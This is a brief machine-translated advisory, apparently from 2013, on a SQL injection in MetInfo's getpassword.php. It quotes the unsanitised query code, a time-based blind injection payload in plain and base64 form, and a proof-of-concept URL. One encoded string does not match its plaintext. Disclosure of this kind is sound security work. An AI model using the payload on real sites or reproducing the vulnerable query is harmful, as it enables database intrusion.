metinfo enterprise website management system SQL injection vulnerability-vulnerability warning-the black bar safety net

2013-06-30T00:00:00
ID MYHACK58:62201339448
Type myhack58
Reporter applychen
Modified 2013-06-30T00:00:00

Description

Brief description:

metinfo enterprise website management systemSQL injectionvulnerability

Detailed description:

member/getpassword. php with admin/admin/getpassword. php file

if($p){

$array = explode('.', base64_decode($p));

$sql="SELECT * FROM $met_admin_table WHERE admin_id='".$ array[0]."'";

$sqlarray = $db->get_one($sql);

base64_decode($p)after the value with explode split and then submitted to the $array array, final$array[0]into the SQL query injection happen.

Vulnerability to prove:

1'or(select sleep(5))#. 1 the base64 encoding MSdvcihzZWxlY3Qgc2xlZXAoMTApKSMumq==

Then

http://demo.metinfo.cn/member/getpassword.php?lang=cn&p=MSdvcihzZWxlY3Qgc2xlZXAoNSkpIy4x

Repair solutions:

Filter$array[0]